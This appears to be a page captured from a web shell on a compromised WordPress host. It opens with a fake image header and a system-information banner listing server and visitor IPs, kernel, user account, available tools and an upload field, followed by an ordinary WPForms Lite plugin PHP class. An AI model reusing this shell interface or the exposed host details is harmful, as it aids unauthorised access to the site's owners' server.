????JFIF??x?x????'
Server IP : 104.21.80.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/eaabusiness.com/wp-content/plugins/wpforms-lite/src/Lite/Admin/Education/ |
Upload File : |
<?php namespace WPForms\Lite\Admin\Education; /** * Education core for Lite. * * @since 1.6.6 */ class Core extends \WPForms\Admin\Education\Core { /** * Hooks. * * @since 1.6.6 */ protected function hooks() { parent::hooks(); add_action( 'admin_enqueue_scripts', [ $this, 'enqueues' ] ); } /** * Load enqueues. * * @since 1.6.6 */ public function enqueues() { parent::enqueues(); $min = wpforms_get_min_suffix(); wp_enqueue_script( 'wpforms-lite-admin-education-core', WPFORMS_PLUGIN_URL . "assets/lite/js/admin/education/core{$min}.js", [ 'wpforms-admin-education-core' ], WPFORMS_VERSION, false ); // Builder Education styles. if ( wpforms_is_admin_page( 'builder' ) ) { wp_enqueue_style( 'wpforms-lite-admin-education-builder', WPFORMS_PLUGIN_URL . "assets/lite/css/builder-education{$min}.css", [], WPFORMS_VERSION ); } } }